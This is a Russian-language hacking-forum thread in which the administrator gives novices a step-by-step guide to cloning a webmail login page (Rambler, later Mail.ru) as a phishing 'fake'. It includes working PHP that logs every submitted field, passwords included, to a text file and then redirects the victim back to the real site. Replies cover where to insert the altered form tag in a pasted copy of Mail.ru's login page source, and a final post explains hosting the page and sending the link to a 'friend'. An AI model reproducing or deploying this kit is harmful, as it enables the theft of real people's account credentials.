Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor


Нужен фейк - делаем сами...

Автор $iD , 10 Jul 2008 19:32

  • Авторизуйтесь для ответа в теме
Сообщений в теме: 8

#1
$iD
Отправлено 10 July 2008 - 19:32

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений

Делимся опытом по созданию фейков


Знания html/php не обязательны, но всетаки лучше чтобы они были, хотябы поверхностными ;)
Возьмем, к примеру, не безызвестный почтовик/поисковик ]]>Rambler.ru]]> B) скажу что сразу, таким же способом делаются фейки на интересующие вас сайты ;)

Делаем шаг раз:
Заходим на ]]>http://rambler.ru]]> и заходим на страничку авторизации, или же сразу идем по вот такой ссылке: ]]>http://id.rambler.ru/script/auth.cgi]]>
-- После того как загрузится страничка авторизации пользователя делаем следующие шаги: Файл -> Сохранить как.

Делаем шаг два:
Заходим  в папку, в которую вы сохранили страничку авторизации и открываем auth.cgi.htm (или как вы его назвали), ищем в нем код такого содержания:
<form method="post" action="auth.cgi?mode=login" name="auth_form">
После того как нашли, делаем не хитрую замену, на такой код:
<form method="post" action="log.php" name="auth_form">
и сохраняем.

-- Собственно полдела сделано ;) Теперь переходим к созданию этого самого log.php

Делаем три:
Создание log.php. Открываем любой текстовый редактор и пишем там такой код:
<?php
header("Location: [url=http://id.rambler.ru/script/auth.cgi");]http://id.rambler.ru/script/auth.cgi");[/url]
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Сохраняем файл как log (если вы делали это в блокноте, то не забываем сменить расширение на .php)

-- Объясняю (для тех кому всеже интересно) как это работает ;)
Вот это строка:
header("Location: http://id.rambler.ru/script/auth.cgi");
Делает не хитрую штуку, которая указывает куда будет перенаправляться пользователь после того как он ввел свои данные ;) т.е. получается что он опять перенаправляется на страницу авторизации B)

А вот эта строка:
$handle = fopen("password.txt", "a");
Хочет открыть файл password.txt. Следовательно, необходимо предварительно создать его :good:
параметр "a" - это режим добавления в файл, т.е. новые записи будут добавляться в конец файла password.txt

-- Остальные строчки работают с password.txt (если инетерсно, найдете сами что они делают ;) )

p.s. Вот вам пошаговое руководство по созданию фейков. Ориентированное на новичков в этом деле.

Пасыба за внимание :)

-- Статья написана за 15мин. и конечно же в ознакомительных целях. :D

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#2
Decline
Отправлено 13 June 2009 - 05:20

Decline

    Бит

  • Members
  • 1 сообщений
тут нет ошибки???
.......

Цитата

header("Location: ]]>http://id.rambler.ru...ipt/auth.cgi");]]>
.......

#3
$iD
Отправлено 13 June 2009 - 05:46

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Decline
нет, там нету ошибки ;)

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#4
Моголь
Отправлено 09 July 2009 - 19:53

Моголь

    Бит

  • Members
  • 1 сообщений
Подскажите плиз, на основе прочитанного хотел сделать фейк к mail.ru но не получилось. Куда в этом коде

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"> 
<html> 
<head> 
<script type="text/javascript">/*<![CDATA[*/
try {
 
// Добавление событий
function timeInterval(bP) {
		if (!rT[bP]) rT[bP] = new Date();
		else {
				rT.i[rT.i.length] = bP + '=' + ( (new Date()).getTime() - rT[bP].getTime() );
				delete rT[bP];
		}
}
 
var rT = {};//renderTime
rT.i = [];
timeInterval('renderbrowser');
rT.addHandler = function(object, event, handler, useCapture) {
		if (object.addEventListener) object.addEventListener(event, handler, useCapture ? useCapture : false);
		else if (object.attachEvent) object.attachEvent('on' + event, handler);
}
rT.radar_type = '';
if (window.name.indexOf('srvt') != -1) {
		rT.srvt = ( new Date() ).getTime() - parseInt( window.name.substr(5) );
		window.name = '';
}
 
rT.addHandler(document, 'click', function() {
		if (!window.name.length || window.name.indexOf('srvt') > -1)
				window.name = 'srvt=' + (new Date()).getTime();
});
rT.addHandler(document, 'keypress', function() {
		if (window.name.indexOf('srvt') > -1) window.name = '';
});
 
rT.img0 = new Image();
rT.img0.src = 'http://mail.radar.imgsmail.ru/update?' +
'p=mail0' +
(rT.radar_type != '' ? ('&t=' + rT.radar_type) : '') +
(rT.srvt ? ('&i=srvt:' + rT.srvt) : '') +
'&v=0&rnd=126811236' +
'';
 
} catch(e) {}
/*]]>*/</script> 
 
 
		
 
 
<title> Вход в систему </title> 
 
 
<meta NAME="DESCRIPTION"
CONTENT="Национальная почтовая служба @Mail.ru - лучшая бесплатная почта. Доступ к почте через POP/SMTP, веб- и wap-интерфейс. Также на портале: авто, новости, спорт, музыка, работа, знакомства, анекдоты, открытки, погода"> 
 
 
<META name="Keywords" content="почта, бесплатная электронная почта, авто, новости, спорт, музыка, работа, знакомства, анекдоты, открытки, погода"> 
 
 
 
<META http-equiv="content-type" content="text/html; charset=windows-1251"> 
 
 
<link rel="shortcut icon" href="http://img.imgsmail.ru/r/favicon.ico" type="image/x-icon" /> 
 
 
<link href="http://img.imgsmail.ru/mail/ru/css/mail-main1.css?123" rel="stylesheet" type=text/css> 
	
<link href="http://img.imgsmail.ru/mail/ru/css/mail-second.css?1" rel="stylesheet" type=text/css> 
	
	
	
 
 
 
<link href="http://img.imgsmail.ru/mail/ru/css/search_top.css?1" rel="stylesheet" type=text/css> 
<script language="javascript" src="http://js.imgsmail.ru/r/js/search_top.js?251212" type="text/javascript" charset="windows-1251"></script> 
 
 
 
 
 
 
<script language="Javascript"> 
<!--
function CheckForm(form)
{
 var i,j;
 var str = '';
 
 var bad_field;
 var fields = new Array();
 var prompts = new Array();
 
 fields[fields.length] = 'Login';
 prompts[prompts.length] = 'Логин';
 
 fields[fields.length] = 'Password';
 prompts[prompts.length] = 'Пароль';
 
 for (i = 0; i < fields.length; i++){
  var field = form[fields[i]];
  var is_bad=0;
  if(field.type == null)
  {
	is_bad=1;
	for(j=0;j<field.length;++j)
	{
		if(field[j].checked==true)
			is_bad=0;
	}
	if(is_bad==1 && str=='')
		field=field[0];
  }
  else switch(field.type)
  {
	case 'select-one':
		if(field[field.selectedIndex].value == '')
			is_bad=1;
		break;
 
	default:
		if (field.value == '') {
			is_bad=1;
			//if(uinfo.field[j].Choose.radio) is_bad=0;
		}
  }
 
  if (is_bad == 1)
  {
	if (str != '')
		{
				str += '\n';
		}else{
				bad_field = field;
		}
		str += prompts[i];
  }
 
 }
 if (str != ''){
   alert("Не заполнены необходимые поля:\n" + str);
   bad_field.focus();
   return false;
 }
 
 
 if (window.RegExp){
   var fields = new Array();
   var prompts = new Array();
   var patterns = new Array();
   var minVal = new Array();
   var maxVal = new Array();
   var maxLen = new Array();
   var minLen = new Array();
   var errors = new Array();
 
   fields[fields.length] = 'Login';
   prompts[prompts.length] = 'Логин';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 128;
   minLen[minLen.length] = 1;
   errors[errors.length] = 'Должен быть указан корректный логин.';
 
   fields[fields.length] = 'Domain';
   prompts[prompts.length] = 'Домен';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 64;
   minLen[minLen.length] = 0;
   errors[errors.length] = 'Должен быть указан корректный домен.';
 
   fields[fields.length] = 'Password';
   prompts[prompts.length] = 'Пароль';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 16;
   minLen[minLen.length] = 0;
   errors[errors.length] = 'Должен быть указан корректный пароль.';
 
   fields[fields.length] = 'agent';
   prompts[prompts.length] = 'agent';
   patterns[patterns.length] = '';
   minVal[minVal.length] = 0;
   maxVal[maxVal.length] = 0;
   maxLen[maxLen.length] = 256;
   minLen[minLen.length] = 0;
   errors[errors.length] = '';
 
   for (i = 0; i < fields.length; i++){
	var bad = false;
	var field = form[fields[i]];
	if (typeof field == 'undefined') continue;
	if (field.value != ''){
	  if (field.value.length > maxLen[i] && maxLen[i] > 0) bad = true;
	  if (field.value.length < minLen[i] && minLen[i] > 0)
	{
		bad = true;
		if(fields[i]=="Password")
			errors[i]="Пароль должен быть не менее четырех символов.";
	}
	 if (patterns[i] != ''){
	  var re = new RegExp(patterns[i]);
	  if (!re.test(field.value + "")) bad = true;
	 }
	 if ((minVal[i] > 0) || (maxVal[i] > 0)){
	  var val = parseInt(field.value,10);
	  if ((val < minVal[i]) || (val > maxVal[i])) bad = true;
	 }
	 if (bad){
	   alert("Неверно заполнено поле " + prompts[i] + "\n" + errors[i]);
	   field.focus();
	   return false;
	 }
	}
   }
 }
 
 return true;
}
// --></script> 
 
 
 
<style TYPE="text/css"> 
#superbest {
position: absolute;
left: 15;
top: 150;
width: 125;
visibility: visible;
z-index: 10;
}
</style> 
 
 
 
 
 
 
 
 
 
</head> 
<body marginwidth=0 marginheight=0 leftmargin=0 rightmargin=0 topmargin=0 bottommargin=0 bgcolor="#ffffff" alink="#F26D00" link="#0857A6" vlink="#0857A6"> 
<!-- WebAgentEnabled: [] --> 
 
 
 
<center> 
 
 
 
<td> 
 
<!--TopList COUNTER--> 
<div style="position:absolute;"> 
<script type="text/javascript"><!--
document.write("<img src='http://counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' width=1 height=1 alt=''>")//--></script> 
 
<script language="Javascript"><!--
d=document;a='';a+=';r='+escape(d.referrer)
js=10//--></script><script language="Javascript1.1"><!--
a+=';j='+navigator.javaEnabled()
js=11//--></script><script language="Javascript1.2"><!--
s=screen;a+=';s='+s.width+'*'+s.height
a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth)
js=12//--></script><script language="Javascript1.3"><!--
js=13//--></script><script language="Javascript"><!--
d.write('<img src="http://top3.mail.ru/counter'+
'?id=110605;js='+js+a+';rand='+Math.random()+
'" alt="" height=1 width=1><br>')
if(js>11)d.write('<'+'!-- ')
//--></script><noscript><img src="http://top3.mail.ru/counter?js=na;id=110605" height=1 width=1 alt=""><br></noscript> 
<script language="Javascript"><!-- 
if(js>11)d.write('--'+'>')//--></script> 
 
</div> 
<!--/TopList COUNTER--> 
 
 
 
</td><td> 
 
<!--begin of Top100<a href="http://top100.rambler.ru/top100/"><img src="http://counter.rambler.ru/top100.cnt?260606" alt="Rambler's Top100" width=1 height=1 border=0><br></a>--> 
 
</td> 
 
 
 
<div style="position:absolute;"> 
<img src="http://www.tns-counter.ru/V13a****mail_ru/ru/CP1251/tmsec=mail_win/" width=1 height=1><br> 
</div> 
 
 
 
 
 
<table  cellpadding=0 cellspacing=0 border=0 width="90%" align=center> 
<tr><td><div style="height: 4px; overflow: hidden;"></div></td></tr> 
</table> 
 
 
 
<table width=90% cellpadding=0 cellspacing=0 border=0><tr> 
<td colspan=3> 
<img src=http://img.imgsmail.ru/0.gif width=760 height=1><br> 
<table cellpadding=0 cellspacing=0 border=0 width=100% class=shapka><tr> 
<td valign=top width=1><img src=http://img.imgsmail.ru/1.gif width=1 height=1></td> 
<td rowspan=2 width=23% align=center height=55><img src=http://img.imgsmail.ru/0.gif width=210 height=1><br> 
<a href=http://mail.ru><img src=http://img.imgsmail.ru/mail/ru/images/logon-mail1.gif width=200 height=54 alt=@Mail.Ru></a><div style="position:relative; height:17px; width:36px; margin-bottom:-17px; top:-43px; left:103px;"><a href="http://r.mail.ru/n15108906"><img border="0" src="http://img.imgsmail.ru/r/wap/wap_icon.gif" height="17" width="36"></a></div></td> 
<td width=77% valign=top><img src=http://img.imgsmail.ru/0.gif width=500 height=1><br> 
<style> 
.mobile_m {text-align:right;padding-right:10px;}
.mobile_m a {color:#ffffff;}
.mobile_m a:hover {color:#ffffff;}
.t__class {}
</style> 
</td> 
<td valign=top width=1><img src=http://img.imgsmail.ru/1.gif width=1 height=1></td> 
</tr><tr> 
<td valign=bottom width=1><img src=http://img.imgsmail.ru/1.gif width=1 height=1></td> 
<td valign=bottom id="forBookMarks"> 
<table cellpadding=0 cellspacing=0 border=0 width=60% align=left id="bookMarksTable"><tr valign=middle> 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/shap_yar_1.gif width=1 height=20></td> 
<td valign=center align=center class=first width=14%><b><a href="start?top=1">Почта</a></b></td> 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/left_on.gif width=23 height=20></td> 
<td valign=center align=center class=mid width=14%><a href="addressbook?1278451852&top=1">Адреса</a></td> 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/both_off.gif width=23 height=20></td> 
<td valign=center align=center class=mid width=14%><a href="http://r.mail.ru/cln3643/my.mail.ru?from_commercial=3">Мой Мир</a><script>//if (screen.width>1020) document.write(' <sup style="color:#F26D00;font-weight:bold;font-family:tahoma">new</sup>');</script></td> 
 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/both_off.gif width=23 height=20></td> 
<td valign=center align=center class=mid width=14%><a href="http://r.mail.ru/cln4167/files.mail.ru">Файлы</a></td> 
 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/both_off.gif width=23 height=20></td> 
<td valign=center align=center class=mid width=14%><a href="http://r.mail.ru/cln3357/foto.mail.ru">Фото</a></td> 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/both_off.gif width=23 height=20></td> 
<td valign=center align=center class=mid width=14%><a href="http://r.mail.ru/cln3642/video.mail.ru">Видео</a></td> 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/both_off.gif width=23 height=20></td> 
<td valign=center align=center class=mid width=14%><a href="http://r.mail.ru/cln3359/blogs.mail.ru">Блоги</a></td> 
<td class=bel><img src=http://img.imgsmail.ru/mail/ru/images/both_off.gif width=23 height=20></td> 
<td valign=center align=center class=mid width=14%><a href="http://r.mail.ru/cln4799/games.mail.ru">Игры</a></td> 
<td class="bel"><img src="http://img.imgsmail.ru/mail/ru/images/both_off.gif" width="23" height="20"></td> 
<td valign="center" align="center" class="mid" width="14%"><a href="http://r.mail.ru/cln5422/love.mail.ru/partner/link.phtml?pid=475306&lid=7095">Знакомства</a></td> 
 
 
 
 
 
<td class="bel"><img src="http://img.imgsmail.ru/mail/ru/images/off.gif" width="23" height="20"></td> 
 
 
</tr></table> 
</td> 
<td valign=bottom width=1><img src=http://img.imgsmail.ru/1.gif width=1 height=1></td> 
</tr></table> 
</td></tr> 
 
</table> 
 
 
 
 
 
 
 
<table width=90% cellpadding=0 cellspacing=0 border=0> 
 
<tr valign=top> 
 
<td width=27%><img src=http://img.imgsmail.ru/0.gif width=150 height=400></td> 
 
<td width=46%><img src=http://img.imgsmail.ru/1.gif width=1 height=20><br> 
 
 
 
<img src=http://img.imgsmail.ru/1.gif width=1 height=10><br> 
 
 
 
 
<h3 class=head_1>Авторизация</h3><img src=http://img.imgsmail.ru/1.gif width=1 height=8><br> 
 
 
 
 
<p class=abzac>Для входа в систему введите, пожалуйста, логин и пароль. Если у Вас еще нет логина, Вам необходимо <a href=http://win.mail.ru/cgi-bin/signup>зарегистрироваться.</a></p> 
 
 
<table width=100% cellpadding=0 cellspacing=0 border=0 class=login> 
 
<form method="post" action="auth" onsubmit="return CheckForm(this);"> 
 
<input type="hidden" name="page" value="http://win.mail.ru/cgi-bin/security"> 
 
<input type="hidden" name="post" value=""> 
 
<input type="hidden" name="login_from" value=""> 
 
<tr> 
 
<td><img src=http://img.imgsmail.ru/0.gif width=55 height=1><br>Имя</td> 
 
<td width=63%><input type="text" name="Login" value="eternity_xant" class=w_100></td> 
 
<td width=37%><select class=w_100  name="Domain"><option value="mail.ru"  SELECTED>@mail.ru</option><option value="inbox.ru" >@inbox.ru</option><option value="bk.ru" >@bk.ru</option><option value="list.ru" >@list.ru</option></select></td> 
 
</tr> 
 
<tr> 
 
<td>Пароль</td>	
 
<td colspan=2> 
 
<table width=100% cellpadding=0 cellspacing=0 border=0><tr> 
 
<td width=100%><input  type="password" name="Password" class=w_100></td> 
 
<td>	<a href="http://www.mail.ru/pages/help/2.html#2185" target=_new>Забыли пароль?</a></td> 
 
</tr></table> 
 
</td>		
 
</tr>			
 
<tr>				
 
<td> </td> 
 
<td><input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label></td> 
 
<td> </td> 
 
</tr> 
 
<tr> 
 
<td> </td> 
 
<td><input type="Submit"  value="	 Войти	 " style="margin-top:4px"></td> 
 
<td> </td> 
 
</tr></form> 
 
</table> 
 
 
 
 
 
 
 
<img src=http://img.imgsmail.ru/0.gif width=380 height=1><br> 
 
</td> 
 
<td width=27%><img src=http://img.imgsmail.ru/0.gif width=150 height=1></td> 
 
</tr> 
 
</table> 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
<table cellpadding=0 cellspacing=0 border=0 width=90%><tr><td> 
<img src=http://img.mail.ru/0.gif width=760 height=2><br> 
<table width=100% cellpadding=0 cellspacing=0 border=0 class=lasttab><tr> 
<td class=lastgr colspan=7><img src=http://img.mail.ru/1.gif width=1 height=1></td> 
</tr><tr> 
<td><img src=http://img.mail.ru/0.gif width=20 height=1></td> 
<td width=30% nowrap>© 1999-2009, <a href="http://corp.mail.ru/">Mail.Ru</a>  
</td> 
<td nowrap><a href=http://win.mail.ru/cgi-bin/signup>Регистрация</a> <b>·</b> <a href=http://blogs.mail.ru/community/mail.ru/ target="_blank">Cообщество пользователей</a> <b>·</b> <a href=http://win.mail.ru/cgi-bin/support  target="_blank">Служба поддержки</a>  </td> 
<td align="right"></td> 
<td><img src=http://img.mail.ru/0.gif width=20 height=1></td> 
</tr><tr> 
<td class=lastgr colspan=7><img src=http://img.mail.ru/1.gif width=1 height=1></td> 
</tr></table> 
</td></tr></table> 
</center> 
<br> 
 
 
 
 
 
 
 
 
 
 
		
<script type="text/javascript">//<![CDATA[
try {
 
timeInterval('renderbrowser');
rT.iGet = '';
for (var i = 0; i < rT.i.length; i++) {
		rT.comma = rT.iGet != '' ? ',' : '';
		var bP = rT.i[i].split('=');
		if (bP[0] != 'renderbrowser') {
				rT.iGet += (rT.comma + bP[0] + ':' + bP[1]);
		} else rT.renderbrowser = parseInt(bP[1]);
}
rT.comma = '';
 
rT.img = new Image(); rT.img.src='http://mail.radar.imgsmail.ru/update?p=mail&t=&v=' + rT.renderbrowser + '&i=' + rT.iGet + '&rnd=779883279' + (document.referrer ? '&r=' + escape(document.referrer) : '') + '';
 
} catch(e) {}
//]]></script> 
 
		
 
 
 
 
</body> 
 
	
</html>
ставить этот ваш Код?
<form method="post" action="log.php" name="auth_form">

#5
$iD
Отправлено 09 July 2009 - 20:05

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Моголь
Вставляй его после:
<table width=100% cellpadding=0 cellspacing=0 border=0 class=login>

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#6
$iD
Отправлено 09 August 2009 - 18:54

$iD

    Админ

  • root
  • PipPipPipPipPipPip
  • 3785 сообщений
Блин, что это? вы же пишите откуда вы что взяли, я же не телепат

и в сл. раз, закиньте лучше это в файл залейте на ifolder например и выкиньте сюда ссылку, а то тему загромождаете.

Реклама на форуме! | Есть идеи? | Хочешь стать модератором?

#7
Shick
Отправлено 16 August 2009 - 12:34

Shick

    Бит

  • Members
  • 3 сообщений
Детский сад, покажи хоть один рабочего фейка по этому образцу? Здесь без soap и pseudns никак не обойтись.

#8
*КРОТ#
Отправлено 10 January 2011 - 06:21

*КРОТ#

    Мегабайт

  • Members
  • PipPipPip
  • 268 сообщений
после того как выполнены все пункты,что делать с получившемся скриптом?
вы ещё не взломаны,тогда мы идём к вам!
асека-403431953

я наблюдаю за тобой.

Изображение

#9
###
Отправлено 29 January 2011 - 14:10

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
заливаешь на хостинг, получаешь домен, даешь ссылку "другу" :lol:

Ссылки из под хайдов не выдаю!

Обратно в Статьи

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Other
  3. Статьи